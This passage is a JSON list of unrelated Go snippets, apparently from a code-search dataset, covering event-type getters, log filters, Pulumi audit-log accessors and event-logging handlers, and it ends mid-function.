[ "func (e _event) Type() string { return e.Type_ }", "func (ev binlogEvent) Type() byte {\n\treturn ev.Bytes()[BinlogEventTypeOffset]\n}", "func (e *basicEvent) Type() Type {\n\treturn e.dtype\n}", "func EventType(val string) zap.Field {\n\treturn zap.String(FieldEventType, val)\n}", "func (bse *BaseEvent) Type(eventType string) {\n\tbse.EventType = eventType\n}", "func (e *Event) Type() string {\n\treturn e.eventType\n}", "func getEventLogInfo(parsedEventLogEntry types.TpmEvent) types.EventLog {\n\n\tlog.Trace(\"vmware_host_connector:getEventLogInfo() Entering\")\n\tdefer log.Trace(\"vmware_host_connector:getEventLogInfo() Leaving\")\n\teventLog := types.EventLog{Measurement: intArrayToHexString(parsedEventLogEntry.EventDetails.DataHash)}\n\n\tif parsedEventLogEntry.EventDetails.VibName != nil {\n\t\teventLog.TypeID = VIB_NAME_TYPE_ID\n\t\teventLog.TypeName = *parsedEventLogEntry.EventDetails.ComponentName\n\t\teventLog.Tags = append(eventLog.Tags, COMPONENT_PREFIX+*parsedEventLogEntry.EventDetails.ComponentName)\n\t\tif *parsedEventLogEntry.EventDetails.VibName != \"\" {\n\t\t\teventLog.Tags = append(eventLog.Tags, VIM_API_PREFIX+TPM_SOFTWARE_COMPONENT_EVENT_TYPE+DETAILS_SUFFIX+\"_\"+*parsedEventLogEntry.EventDetails.VibName+\"_\"+*parsedEventLogEntry.EventDetails.VibVendor)\n\t\t} else {\n\t\t\teventLog.Tags = append(eventLog.Tags, VIM_API_PREFIX+TPM_SOFTWARE_COMPONENT_EVENT_TYPE+DETAILS_SUFFIX)\n\t\t}\n\t} else if parsedEventLogEntry.EventDetails.CommandLine != nil {\n\t\teventLog.TypeID = COMMANDLINE_TYPE_ID\n\t\tuuid := getBootUUIDFromCL(*parsedEventLogEntry.EventDetails.CommandLine)\n\t\tif uuid != \"\" {\n\t\t\teventLog.Tags = append(eventLog.Tags, COMMANDLINE_PREFIX)\n\t\t} else {\n\t\t\teventLog.Tags = append(eventLog.Tags, COMMANDLINE_PREFIX+*parsedEventLogEntry.EventDetails.CommandLine)\n\t\t}\n\t\teventLog.TypeName = *parsedEventLogEntry.EventDetails.CommandLine\n\t\teventLog.Tags = append(eventLog.Tags, VIM_API_PREFIX+TPM_COMMAND_EVENT_TYPE+DETAILS_SUFFIX)\n\n\t} else if parsedEventLogEntry.EventDetails.OptionsFileName != nil {\n\t\teventLog.TypeID = OPTIONS_FILE_NAME_TYPE_ID\n\t\teventLog.TypeName = *parsedEventLogEntry.EventDetails.OptionsFileName\n\t\teventLog.Tags = append(eventLog.Tags, BOOT_OPTIONS_PREFIX+*parsedEventLogEntry.EventDetails.OptionsFileName)\n\t\teventLog.Tags = append(eventLog.Tags, VIM_API_PREFIX+TPM_OPTION_EVENT_TYPE+DETAILS_SUFFIX)\n\n\t} else if parsedEventLogEntry.EventDetails.BootSecurityOption != nil {\n\t\teventLog.TypeID = BOOT_SECURITY_OPTION_TYPE_ID\n\t\teventLog.TypeName = *parsedEventLogEntry.EventDetails.BootSecurityOption\n\t\teventLog.Tags = append(eventLog.Tags, BOOT_SECURITY_OPTIONS_PREFIX+*parsedEventLogEntry.EventDetails.BootSecurityOption)\n\t\teventLog.Tags = append(eventLog.Tags, VIM_API_PREFIX+TPM_BOOT_SECURITY_OPTION_EVENT_TYPE+DETAILS_SUFFIX)\n\t} else {\n\t\tlog.Warn(\"Unrecognized event in module event log\")\n\t}\n\n\treturn eventLog\n}", "func (e Event) GetType() int {\n\treturn int(C.caca_get_event_type(e.Ev))\n}", "func (e *Event) GetType() string {\n\tif e == nil || e.Type == nil {\n\t\treturn \"\"\n\t}\n\treturn *e.Type\n}", "func EventKind(val string) zap.Field {\n\treturn zap.String(FieldEventKind, val)\n}", "func (e *basicEvent) TypeString() string {\n\treturn e.etype\n}", "func (e *Event) Type() EventType {\n\treturn e.eventID\n}", "func (c *InjectEvent) AggregateType() eh.AggregateType { return AggregateType }", "func (uem UnknownEventMetadata) Type() string {\n\treturn \"unknown\"\n}", "func gethUnpackLog(codec *contractCodec, out interface{}, event string, log types.Log) error {\n\tif len(log.Data) > 0 {\n\t\tif err := codec.abi.UnpackIntoInterface(out, event, log.Data); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tvar indexed abi.Arguments\n\tfor _, arg := range codec.abi.Events[event].Inputs {\n\t\tif arg.Indexed {\n\t\t\tindexed = append(indexed, arg)\n\t\t}\n\t}\n\treturn parseTopics(out, indexed, log.Topics[1:])\n}", "func (e *Event) GetType() EventType {\n\treturn EventType(C.CALL_MACRO_GST_EVENT_TYPE(e.g()))\n}", "func (ce *CustomEvent) GetType() string {\n\treturn ce.eventType.String()\n}", "func CastBACnetLogDataLogDataEntryAnyValue(structType any) BACnetLogDataLogDataEntryAnyValue {\n\tif casted, ok := structType.(BACnetLogDataLogDataEntryAnyValue); ok {\n\t\treturn casted\n\t}\n\tif casted, ok := structType.(*BACnetLogDataLogDataEntryAnyValue); ok {\n\t\treturn *casted\n\t}\n\treturn nil\n}", "func (f *FilterConfig) Event(ctx context.Context, event logevent.LogEvent) (logevent.LogEvent, bool) {\n\tfor _, field := range f.Fields {\n\t\tif value, ok := event.GetValue(field); ok {\n\t\t\tswitch f.ConvType {\n\t\t\tcase convTypeString:\n\t\t\t\tswitch v := value.(type) {\n\t\t\t\tcase string:\n\t\t\t\tdefault:\n\t\t\t\t\tevent.SetValue(field, fmt.Sprintf(\"%v\", v))\n\t\t\t\t}\n\t\t\tcase convTypeInt64:\n\t\t\t\tswitch v := value.(type) {\n\t\t\t\tcase string:\n\t\t\t\t\tif vparse, err := strconv.ParseInt(v, 0, 64); err == nil {\n\t\t\t\t\t\tevent.SetValue(field, vparse)\n\t\t\t\t\t} else if vparse, err := strconv.ParseFloat(v, 64); err == nil {\n\t\t\t\t\t\tevent.SetValue(field, int64(vparse))\n\t\t\t\t\t} else {\n\t\t\t\t\t\tgoglog.Logger.Error(err)\n\t\t\t\t\t\tevent.AddTag(ErrorTag)\n\t\t\t\t\t}\n\t\t\t\tcase int:\n\t\t\t\t\tevent.SetValue(field, int64(v))\n\t\t\t\tcase int8:\n\t\t\t\t\tevent.SetValue(field, int64(v))\n\t\t\t\tcase int16:\n\t\t\t\t\tevent.SetValue(field, int64(v))\n\t\t\t\tcase int32:\n\t\t\t\t\tevent.SetValue(field, int64(v))\n\t\t\t\tcase int64:\n\t\t\t\tcase float32:\n\t\t\t\t\tevent.SetValue(field, int64(v))\n\t\t\t\tcase float64:\n\t\t\t\t\tevent.SetValue(field, int64(v))\n\t\t\t\tdefault:\n\t\t\t\t\tif vparse, err := strconv.ParseInt(fmt.Sprintf(\"%v\", v), 0, 64); err == nil {\n\t\t\t\t\t\tevent.SetValue(field, vparse)\n\t\t\t\t\t} else if vparse, err := strconv.ParseFloat(fmt.Sprintf(\"%v\", v), 64); err == nil {\n\t\t\t\t\t\tevent.SetValue(field, int64(vparse))\n\t\t\t\t\t} else {\n\t\t\t\t\t\tgoglog.Logger.Error(err)\n\t\t\t\t\t\tevent.AddTag(ErrorTag)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tcase convTypeFloat64:\n\t\t\t\tswitch v := value.(type) {\n\t\t\t\tcase string:\n\t\t\t\t\tif vparse, err := strconv.ParseFloat(v, 64); err == nil {\n\t\t\t\t\t\tevent.SetValue(field, vparse)\n\t\t\t\t\t} else {\n\t\t\t\t\t\tgoglog.Logger.Error(err)\n\t\t\t\t\t\tevent.AddTag(ErrorTag)\n\t\t\t\t\t}\n\t\t\t\tcase int:\n\t\t\t\t\tevent.SetValue(field, float64(v))\n\t\t\t\tcase int8:\n\t\t\t\t\tevent.SetValue(field, float64(v))\n\t\t\t\tcase int16:\n\t\t\t\t\tevent.SetValue(field, float64(v))\n\t\t\t\tcase int32:\n\t\t\t\t\tevent.SetValue(field, float64(v))\n\t\t\t\tcase int64:\n\t\t\t\t\tevent.SetValue(field, float64(v))\n\t\t\t\tcase float32:\n\t\t\t\t\tevent.SetValue(field, float64(v))\n\t\t\t\tcase float64:\n\t\t\t\tdefault:\n\t\t\t\t\tif vparse, err := strconv.ParseFloat(fmt.Sprintf(\"%v\", v), 64); err == nil {\n\t\t\t\t\t\tevent.SetValue(field, vparse)\n\t\t\t\t\t} else {\n\t\t\t\t\t\tgoglog.Logger.Error(err)\n\t\t\t\t\t\tevent.AddTag(ErrorTag)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\t// TODO: no converts return false\n\treturn event, true\n}", "func (me TEventType) String() string { return xsdt.String(me).String() }", "func (t *TimeDynamic) LogValue() interface{} {\n\tvar now time.Time\n\tif t.TimeKeeper == nil {\n\t\tnow = time.Now()\n\t} else {\n\t\tnow = t.TimeKeeper.Now()\n\t}\n\tif t.UTC {\n\t\tnow = now.UTC()\n\t}\n\tif !t.AsString {\n\t\treturn now\n\t}\n\tif t.Layout == \"\" {\n\t\treturn now.Format(time.RFC3339)\n\t}\n\treturn now.Format(t.Layout)\n}", "func (event *GGEvent) Type() int {\n\treturn (int)(event._type)\n}", "func (s *SaveApplicationLogEventRequest) TypeInfo() tdp.Type {\n\ttyp := tdp.Type{\n\t\tName: \"saveApplicationLogEvent\",\n\t\tID: SaveApplicationLogEventRequestTypeID,\n\t}\n\tif s == nil {\n\t\ttyp.Null = true\n\t\treturn typ\n\t}\n\ttyp.Fields = []tdp.Field{\n\t\t{\n\t\t\tName: \"Type\",\n\t\t\tSchemaName: \"type\",\n\t\t},\n\t\t{\n\t\t\tName: \"ChatID\",\n\t\t\tSchemaName: \"chat_id\",\n\t\t},\n\t\t{\n\t\t\tName: \"Data\",\n\t\t\tSchemaName: \"data\",\n\t\t},\n\t}\n\treturn typ\n}", "func (a ProblemAdapter) GetEvent() string {\n\treturn a.cloudEvent.GetType()\n}", "func (e event) Data() eh.EventData {\n\treturn e.AggregateEvent.data\n}", "func (o AuditLogConfigResponseOutput) LogType() pulumi.StringOutput {\n\treturn o.ApplyT(func(v AuditLogConfigResponse) string { return v.LogType }).(pulumi.StringOutput)\n}", "func (o AuditLogConfigResponseOutput) LogType() pulumi.StringOutput {\n\treturn o.ApplyT(func(v AuditLogConfigResponse) string { return v.LogType }).(pulumi.StringOutput)\n}", "func (o AuditLogConfigResponseOutput) LogType() pulumi.StringOutput {\n\treturn o.ApplyT(func(v AuditLogConfigResponse) string { return v.LogType }).(pulumi.StringOutput)\n}", "func (o AuditLogConfigResponseOutput) LogType() pulumi.StringOutput {\n\treturn o.ApplyT(func(v AuditLogConfigResponse) string { return v.LogType }).(pulumi.StringOutput)\n}", "func (o AuditLogConfigResponseOutput) LogType() pulumi.StringOutput {\n\treturn o.ApplyT(func(v AuditLogConfigResponse) string { return v.LogType }).(pulumi.StringOutput)\n}", "func (m *EventLog) Get(key string) interface{} {\n\treturn m.Payload()[key]\n}", "func (e *Enum) Value(gtx *layout.Context) string {\n\tfor i := range e.clicks {\n\t\tfor _, ev := range e.clicks[i].Events(gtx) {\n\t\t\tswitch ev.Type {\n\t\t\tcase gesture.TypeClick:\n\t\t\t\te.value = e.values[i]\n\t\t\t}\n\t\t}\n\t}\n\treturn e.value\n}", "func (et EventerType) String() string {\n\tswitch et {\n\tcase LogFile:\n\t\treturn \"file\"\n\tcase Journald:\n\t\treturn \"journald\"\n\tcase Memory:\n\t\treturn \"memory\"\n\tcase Null:\n\t\treturn \"none\"\n\tdefault:\n\t\treturn \"invalid\"\n\t}\n}", "func (v Value) Type() Type {\n\tpanic(message)\n}", "func (fc *FilterConfig) Event(event utils.LogEvent) utils.LogEvent {\n\tif event.Extra == nil {\n\t\tevent.Extra = make(map[string]interface{})\n\t}\n\targs := strings.Split(event.Message, fc.Separator)\n\tif len(args) > 0 {\n\t\tevent.Message = args[0]\n\t}\n\n\tevent.Extra[\"args\"] = args[1:]\n\n\treturn event\n}", "func (s *Smpval) Value() reflect.Value {\n\treturn s.val\n}", "func (e *EventAPI) Get(name string) (*EventType, error) {\n\teventType := &EventType{}\n\terr := e.client.httpGET(e.backOffConf.create(), e.eventURL(name), eventType, \"unable to request event types\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn eventType, nil\n}", "func (server *p2pLogEx) GetValue(logEx *LogEx, key log.EncodedHash, object *[]byte) error {\n value, err := logEx.theLog.GetValue(key)\n if err != nil {\n return err\n }\n *object = value\n return nil\n}", "func (*SaveApplicationLogEventRequest) TypeName() string {\n\treturn \"saveApplicationLogEvent\"\n}", "func (handler *ConsoleLogHandler) Process(entry interface{}) {\r\n if data, ok := entry.([]byte); ok {\r\n fmt.Println(string(data))\r\n }\r\n}", "func (e *Event) GoString() string {\n\treturn e.String()\n}", "func (e *Event) GoString() string {\n\treturn e.String()\n}", "func (o AuditLogConfigOutput) LogType() AuditLogConfigLogTypePtrOutput {\n\treturn o.ApplyT(func(v AuditLogConfig) *AuditLogConfigLogType { return v.LogType }).(AuditLogConfigLogTypePtrOutput)\n}", "func (o AuditLogConfigOutput) LogType() AuditLogConfigLogTypePtrOutput {\n\treturn o.ApplyT(func(v AuditLogConfig) *AuditLogConfigLogType { return v.LogType }).(AuditLogConfigLogTypePtrOutput)\n}", "func (o AuditLogConfigOutput) LogType() AuditLogConfigLogTypePtrOutput {\n\treturn o.ApplyT(func(v AuditLogConfig) *AuditLogConfigLogType { return v.LogType }).(AuditLogConfigLogTypePtrOutput)\n}", "func (o AuditLogConfigOutput) LogType() AuditLogConfigLogTypePtrOutput {\n\treturn o.ApplyT(func(v AuditLogConfig) *AuditLogConfigLogType { return v.LogType }).(AuditLogConfigLogTypePtrOutput)\n}", "func (o AuditLogConfigOutput) LogType() AuditLogConfigLogTypePtrOutput {\n\treturn o.ApplyT(func(v AuditLogConfig) *AuditLogConfigLogType { return v.LogType }).(AuditLogConfigLogTypePtrOutput)\n}", "func (ul *UserlogService) StoreGlobalEvent(ctx context.Context, typ string, data map[string]string) error {\n\tctx, span := ul.tracer.Start(ctx, \"StoreGlobalEvent\")\n\tdefer span.End()\n\tswitch typ {\n\tdefault:\n\t\treturn fmt.Errorf(\"unknown event type: %s\", typ)\n\tcase \"deprovision\":\n\t\tdps, ok := data[\"deprovision_date\"]\n\t\tif !ok {\n\t\t\treturn errors.New(\"need 'deprovision_date' in request body\")\n\t\t}\n\n\t\tformat := data[\"deprovision_date_format\"]\n\t\tif format == \"\" {\n\t\t\tformat = time.RFC3339\n\t\t}\n\n\t\tdate, err := time.Parse(format, dps)\n\t\tif err != nil {\n\t\t\tfmt.Println(\"\", format, \"\\n\", dps)\n\t\t\treturn fmt.Errorf(\"cannot parse time to format. time: '%s' format: '%s'\", dps, format)\n\t\t}\n\n\t\tev := DeprovisionData{\n\t\t\tDeprovisionDate: date,\n\t\t\tDeprovisionFormat: format,\n\t\t}\n\n\t\tb, err := json.Marshal(ev)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\treturn ul.alterGlobalEvents(ctx, func(evs map[string]json.RawMessage) error {\n\t\t\tevs[typ] = b\n\t\t\treturn nil\n\t\t})\n\t}\n}", "func getEventValue(event *kube_api.Event) (string, error) {\n\t// TODO: check whether indenting is required.\n\tbytes, err := json.MarshalIndent(event, \"\", \" \")\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn string(bytes), nil\n}", "func (bot) Type(t string) string {\n\tif !contains(knownBotEvents, t) {\n\t\tlog.Printf(\"[WARN] unknown bot event type: %q\", t)\n\t}\n\treturn strings.ToLower(fmt.Sprintf(bot_type_template, t))\n}", "func (s JobLogEventData) GoString() string {\n\treturn s.String()\n}", "func (c *Collection) GetEvent(\n\tkey, typ string, ts time.Time, ordinal int64, value interface{},\n) (*Event, error) {\n\tevent := &Event{\n\t\tCollection: c,\n\t\tKey: key,\n\t\tOrdinal: ordinal,\n\t\tTimestamp: ts,\n\t\tType: typ,\n\t}\n\n\t// Perform the actual GET\n\tpath := fmt.Sprintf(\"%s/%s/events/%s/%d/%d\", c.Name, key, typ,\n\t\tts.UnixNano()/1000000, ordinal)\n\tvar responseData jsonEvent\n\t_, err := c.client.jsonReply(\"GET\", path, nil, 200, &responseData)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Move the data from the returned values into the Event object.\n\tevent.Value = responseData.Value\n\tevent.Ref = responseData.Path.Ref\n\tsecs := responseData.Timestamp / 1000\n\tnsecs := (responseData.Timestamp % 1000) * 1000000\n\tevent.Timestamp = time.Unix(secs, nsecs)\n\tevent.Ordinal = responseData.Ordinal\n\n\t// If the user provided us a place to unmarshal the 'value' field into\n\t// we do that here.\n\tif value != nil {\n\t\treturn event, event.Unmarshal(value)\n\t}\n\n\t// Success\n\treturn event, nil\n}", "func (x *fastReflection_EventReceive) Get(descriptor protoreflect.FieldDescriptor) protoreflect.Value {\n\tswitch descriptor.FullName() {\n\tcase \"regen.ecocredit.v1alpha1.EventReceive.sender\":\n\t\tvalue := x.Sender\n\t\treturn protoreflect.ValueOfString(value)\n\tcase \"regen.ecocredit.v1alpha1.EventReceive.recipient\":\n\t\tvalue := x.Recipient\n\t\treturn protoreflect.ValueOfString(value)\n\tcase \"regen.ecocredit.v1alpha1.EventReceive.batch_denom\":\n\t\tvalue := x.BatchDenom\n\t\treturn protoreflect.ValueOfString(value)\n\tcase \"regen.ecocredit.v1alpha1.EventReceive.tradable_amount\":\n\t\tvalue := x.TradableAmount\n\t\treturn protoreflect.ValueOfString(value)\n\tcase \"regen.ecocredit.v1alpha1.EventReceive.retired_amount\":\n\t\tvalue := x.RetiredAmount\n\t\treturn protoreflect.ValueOfString(value)\n\tcase \"regen.ecocredit.v1alpha1.EventReceive.basket_denom\":\n\t\tvalue := x.BasketDenom\n\t\treturn protoreflect.ValueOfString(value)\n\tdefault:\n\t\tif descriptor.IsExtension() {\n\t\t\tpanic(fmt.Errorf(\"proto3 declared messages do not support extensions: regen.ecocredit.v1alpha1.EventReceive\"))\n\t\t}\n\t\tpanic(fmt.Errorf(\"message regen.ecocredit.v1alpha1.EventReceive does not contain field %s\", descriptor.FullName()))\n\t}\n}", "func (e *Event) Data(out interface{}) error {\n\treturn json.Unmarshal([]byte(e.data), out)\n}", "func (s *Smpval) Type() reflect.Type {\n\treturn s.val.Type()\n}", "func (s *Structured) GetType() string {\n\treturn s.cloudEvent.EventType\n}", "func UnmarshalEvent(data []byte) (Event, error) {\n\t//first we extract the generic part\n\taux := struct {\n\t\tStreamTCStr string `json:\"stream-timecode\"`\n\t\tRecTCStr string `json:\"rec-timecode\"`\n\t\tUpdateType string `json:\"update-type\"`\n\t}{}\n\n\tif err := json.Unmarshal(data, &aux); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif len(aux.UpdateType) == 0 {\n\t\treturn nil, ErrNotEventMessage{}\n\t}\n\trawE := &rawEvent{\n\t\teventType: aux.UpdateType,\n\t\trecTC: -1,\n\t\tstreamTC: -1,\n\t}\n\n\tif len(aux.StreamTCStr) > 0 {\n\t\tvar err error\n\t\trawE.streamTC, err = parseTC(aux.StreamTCStr)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif len(aux.RecTCStr) > 0 {\n\t\tvar err error\n\t\trawE.recTC, err = parseTC(aux.RecTCStr)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\t// now we extract the generic part\n\tevType, ok := eventFactory[rawE.UpdateType()]\n\tif ok == false {\n\t\treturn nil, ErrUnknownEventType{rawE.UpdateType()}\n\t}\n\n\tevInst := reflect.New(evType)\n\tev := evInst.Interface().(Event)\n\n\terr := json.Unmarshal(data, &ev)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// copy back initial data\n\tev.copyFromOther(rawE)\n\treturn ev, nil\n}", "func (f Fields) ValueForFieldOfType(fieldName, typ string) string {\n\tfor _, field := range f {\n\t\tif field.Var == fieldName && field.Type == typ && len(field.Values) > 0 {\n\t\t\treturn field.Values[0]\n\t\t}\n\t}\n\treturn \"\"\n}", "func (o SolutionOutput) EventType() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Solution) pulumi.StringPtrOutput { return v.EventType }).(pulumi.StringPtrOutput)\n}", "func (l *ZapLogger) LogEvent(event Event) {\n\tswitch e := event.(type) {\n\tcase *OnStartExecuting:\n\t\tl.Logger.Info(\"OnStart hook executing\",\n\t\t\tzap.String(\"callee\", e.FunctionName),\n\t\t\tzap.String(\"caller\", e.CallerName),\n\t\t)\n\tcase *OnStartExecuted:\n\t\tif e.Err != nil {\n\t\t\tl.Logger.Info(\"OnStart hook failed\",\n\t\t\t\tzap.String(\"callee\", e.FunctionName),\n\t\t\t\tzap.String(\"caller\", e.CallerName),\n\t\t\t\tzap.Error(e.Err),\n\t\t\t)\n\t\t} else {\n\t\t\tl.Logger.Info(\"OnStart hook executed\",\n\t\t\t\tzap.String(\"callee\", e.FunctionName),\n\t\t\t\tzap.String(\"caller\", e.CallerName),\n\t\t\t\tzap.String(\"runtime\", e.Runtime.String()),\n\t\t\t)\n\t\t}\n\tcase *OnStopExecuting:\n\t\tl.Logger.Info(\"OnStop hook executing\",\n\t\t\tzap.String(\"callee\", e.FunctionName),\n\t\t\tzap.String(\"caller\", e.CallerName),\n\t\t)\n\tcase *OnStopExecuted:\n\t\tif e.Err != nil {\n\t\t\tl.Logger.Info(\"OnStop hook failed\",\n\t\t\t\tzap.String(\"callee\", e.FunctionName),\n\t\t\t\tzap.String(\"caller\", e.CallerName),\n\t\t\t\tzap.Error(e.Err),\n\t\t\t)\n\t\t} else {\n\t\t\tl.Logger.Info(\"OnStop hook executed\",\n\t\t\t\tzap.String(\"callee\", e.FunctionName),\n\t\t\t\tzap.String(\"caller\", e.CallerName),\n\t\t\t\tzap.String(\"runtime\", e.Runtime.String()),\n\t\t\t)\n\t\t}\n\tcase *Supplied:\n\t\tl.Logger.Info(\"supplied\",\n\t\t\tzap.String(\"type\", e.TypeName),\n\t\t\tmoduleField(e.ModuleName),\n\t\t\tzap.Error(e.Err))\n\tcase *Provided:\n\t\tfor _, rtype := range e.OutputTypeNames {\n\t\t\tl.Logger.Info(\"provided\",\n\t\t\t\tzap.String(\"constructor\", e.ConstructorName),\n\t\t\t\tmoduleField(e.ModuleName),\n\t\t\t\tzap.String(\"type\", rtype),\n\t\t\t)\n\t\t}\n\t\tif e.Err != nil {\n\t\t\tl.Logger.Error(\"error encountered while applying options\",\n\t\t\t\tmoduleField(e.ModuleName),\n\t\t\t\tzap.Error(e.Err))\n\t\t}\n\tcase *Decorated:\n\t\tfor _, rtype := range e.OutputTypeNames {\n\t\t\tl.Logger.Info(\"decorated\",\n\t\t\t\tzap.String(\"decorator\", e.DecoratorName),\n\t\t\t\tmoduleField(e.ModuleName),\n\t\t\t\tzap.String(\"type\", rtype),\n\t\t\t)\n\t\t}\n\t\tif e.Err != nil {\n\t\t\tl.Logger.Error(\"error encountered while applying options\",\n\t\t\t\tmoduleField(e.ModuleName),\n\t\t\t\tzap.Error(e.Err))\n\t\t}\n\tcase *Invoking:\n\t\t// Do not log stack as it will make logs hard to read.\n\t\tl.Logger.Info(\"invoking\",\n\t\t\tzap.String(\"function\", e.FunctionName),\n\t\t\tmoduleField(e.ModuleName),\n\t\t)\n\tcase *Invoked:\n\t\tif e.Err != nil {\n\t\t\tl.Logger.Error(\"invoke failed\",\n\t\t\t\tzap.Error(e.Err),\n\t\t\t\tzap.String(\"stack\", e.Trace),\n\t\t\t\tzap.String(\"function\", e.FunctionName),\n\t\t\t\tmoduleField(e.ModuleName),\n\t\t\t)\n\t\t}\n\tcase *Stopping:\n\t\tl.Logger.Info(\"received signal\",\n\t\t\tzap.String(\"signal\", strings.ToUpper(e.Signal.String())))\n\tcase *Stopped:\n\t\tif e.Err != nil {\n\t\t\tl.Logger.Error(\"stop failed\", zap.Error(e.Err))\n\t\t}\n\tcase *RollingBack:\n\t\tl.Logger.Error(\"start failed, rolling back\", zap.Error(e.StartErr))\n\tcase *RolledBack:\n\t\tif e.Err != nil {\n\t\t\tl.Logger.Error(\"rollback failed\", zap.Error(e.Err))\n\t\t}\n\tcase *Started:\n\t\tif e.Err != nil {\n\t\t\tl.Logger.Error(\"start failed\", zap.Error(e.Err))\n\t\t} else {\n\t\t\tl.Logger.Info(\"started\")\n\t\t}\n\tcase *LoggerInitialized:\n\t\tif e.Err != nil {\n\t\t\tl.Logger.Error(\"custom logger initialization failed\", zap.Error(e.Err))\n\t\t} else {\n\t\t\tl.Logger.Info(\"initialized custom fxevent.Logger\", zap.String(\"function\", e.ConstructorName))\n\t\t}\n\t}\n}", "func (t *Type) Val() *Type", "func (e event) Data() eh.EventData {\n\treturn e.dbEvent.data\n}", "func (l eventlog) Log(context interface{}, name string, message string, data ...interface{}) {}", "func (t Type) String() string {\n\treturn fmt.Sprintf(`event.%v`, t.Name())\n}", "func (o *GetPostListParams) bindEventType(rawData []string, hasKey bool, formats strfmt.Registry) error {\n\tvar raw string\n\tif len(rawData) > 0 {\n\t\traw = rawData[len(rawData)-1]\n\t}\n\n\t// Required: false\n\t// AllowEmptyValue: false\n\n\tif raw == \"\" { // empty values pass all other validations\n\t\treturn nil\n\t}\n\to.EventType = &raw\n\n\tif err := o.validateEventType(formats); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (f *field) Val() interface{} {\n\treturn f.v\n}", "func (it *eventsIterator) Value() (*spec.Event, error) {\n\treturn deserializeEvent(it.inner.Value())\n}", "func (o FunctionEventTriggerOutput) EventType() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v FunctionEventTrigger) *string { return v.EventType }).(pulumi.StringPtrOutput)\n}", "func (m MapEntry) Val() interface{} {\n\treturn m.val\n}", "func (t ProductType) Value() (driver.Value, error) {\n\tswitch t {\n\tcase IT, Decorate, Etc: //valid case\n\t\treturn string(t), nil\n\t}\n\treturn nil, errors.New(\"Invalid product type value\") //else is invalid\n}", "func (v Value) Type() querypb.Type {\n\treturn v.typ\n}", "func (s *Sentry) Event(logEvent *event.Event) error {\n\tmessage := logEvent.Message\n\tif err, ok := logEvent.FlatFields[\"error\"]; ok {\n\t\tmessage = fmt.Sprintf(\"%s: %v\", message, err)\n\t} else if err, ok := logEvent.FlatFields[\"err\"]; ok {\n\t\tmessage = fmt.Sprintf(\"%s: %v\", message, err)\n\t}\n\n\ts.RLock()\n\tpacket := raven.NewPacket(message)\n\tpacket.Logger = \"sawmill\"\n\tpacket.EventID = s.idPrefix + strconv.FormatInt(int64(logEvent.Id), 10)\n\tpacket.Timestamp = raven.Timestamp(logEvent.Time)\n\tpacket.Level = ravenLevels[logEvent.Level]\n\tfor k, v := range logEvent.FlatFields {\n\t\tpacket.Extra[k] = v\n\t}\n\n\tif len(logEvent.Stack) != 0 {\n\t\tpacket.Culprit = logEvent.Stack[0].Package + \".\" + logEvent.Stack[0].Func\n\t}\n\n\t// translate logEvent.Stack into raven.Stacktrace\n\tpacket.Interfaces = append(packet.Interfaces, ravenTrace(s.repoRoot, logEvent.Stack))\n\n\t_, errChan := s.client.Capture(packet, nil)\n\terr := <-errChan\n\ts.RUnlock()\n\treturn err\n}", "func (EventType) Values() []EventType {\n\treturn []EventType{\n\t\t\"instanceChange\",\n\t\t\"fleetRequestChange\",\n\t\t\"error\",\n\t\t\"information\",\n\t}\n}", "func (s Event) GoString() string {\n\treturn s.String()\n}", "func (handler *Handler) Event(logEvent *event.Event) error {\n\thandler.mutex.Lock()\n\thandler.events = append(handler.events, logEvent)\n\thandler.mutex.Unlock()\n\treturn nil\n}", "func (el *LagerEventListener) Event(e *event.Event) {\n\tlogger := openlogging.GetLogger()\n\tl, ok := logger.(lager.Logger)\n\tif !ok {\n\t\treturn\n\t}\n\n\topenlogging.Info(\"Get lager e\", openlogging.WithTags(openlogging.Tags{\n\t\t\"key\": e.Key,\n\t\t\"value\": e.Value,\n\t\t\"type\": e.EventType,\n\t}))\n\n\tv, ok := e.Value.(string)\n\tif !ok {\n\t\treturn\n\t}\n\n\tvar lagerLogLevel lager.LogLevel\n\tswitch strings.ToUpper(v) {\n\tcase log.DEBUG:\n\t\tlagerLogLevel = lager.DEBUG\n\tcase log.INFO:\n\t\tlagerLogLevel = lager.INFO\n\tcase log.WARN:\n\t\tlagerLogLevel = lager.WARN\n\tcase log.ERROR:\n\t\tlagerLogLevel = lager.ERROR\n\tcase log.FATAL:\n\t\tlagerLogLevel = lager.FATAL\n\tdefault:\n\t\topenlogging.Info(\"ops..., got unknown logger level\")\n\t\treturn\n\t}\n\n\tswitch e.EventType {\n\tcase common.Update:\n\t\tl.SetLogLevel(lagerLogLevel)\n\t}\n}", "func (s *SaveApplicationLogEventRequest) GetType() (value string) {\n\tif s == nil {\n\t\treturn\n\t}\n\treturn s.Type\n}", "func (c *Collection) innerAddEvent(\n\tkey, typ string, ts *time.Time, value interface{},\n) (*Event, error) {\n\tevent := &Event{\n\t\tCollection: c,\n\t\tKey: key,\n\t\tType: typ,\n\t}\n\n\t// Encode the JSON message into a raw value that we can return to the\n\t// client if necessary.\n\tif rawMsg, err := json.Marshal(value); err != nil {\n\t\treturn nil, err\n\t} else {\n\t\tevent.Value = json.RawMessage(rawMsg)\n\t}\n\n\t// Perform the actual POST\n\theaders := map[string]string{\"Content-Type\": \"application/json\"}\n\tvar path string\n\tif ts != nil {\n\t\tpath = fmt.Sprintf(\"%s/%s/events/%s/%d\", c.Name, key, typ,\n\t\t\tts.UnixNano()/1000000)\n\t} else {\n\t\tpath = fmt.Sprintf(\"%s/%s/events/%s\", c.Name, key, typ)\n\t}\n\tresp, err := c.client.emptyReply(\"POST\", path, headers,\n\t\tbytes.NewBuffer(event.Value), 201)\n\tif err != nil {\n\t\treturn nil, 